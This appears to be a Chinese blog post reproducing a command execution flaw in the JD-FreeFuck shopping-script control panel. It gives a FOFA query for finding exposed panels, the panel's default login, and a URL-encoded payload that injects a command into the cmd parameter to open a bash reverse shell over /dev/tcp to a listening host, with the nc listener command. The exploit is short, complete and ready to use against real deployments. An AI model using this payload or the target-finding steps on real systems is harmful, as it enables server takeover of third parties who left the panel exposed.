JD-FreeFuck 后台命令执行漏洞

JD-FreeFuck 后台命令执行漏洞

漏洞说明

JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器

项目地址:https://github.com/meselson/JD-FreeFuck

环境搭建

脚本一键部署:

bash <(curl -sSL https://gitee.com/mjf521/JD-FreeFuck/raw/main/install.sh)

漏洞复现

FOFA搜索

title="京东薅羊毛控制面板"

访问后登录页面

image-20210413180417572

默认用户名密码:

useradmin
supermanito

image-20210413180601261

手动执行脚本---切换换行抓包

![屏幕截图 2021-04-14 100803](https://tomyyyyy.oss-cn-hangzhou.aliyuncs.com/img/屏幕截图 2021-04-14 100803.jpg)

然后发送包:

Snipaste_2021-04-14_10-17-58

反弹shell

cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2F192.168.1.101%2F44444+%3C%261'%3B+now

监听端:

nc -lvvp 44444
posted @ 2021-04-14 11:15  tomyyyyy  阅读(1587)  评论(1编辑  收藏  举报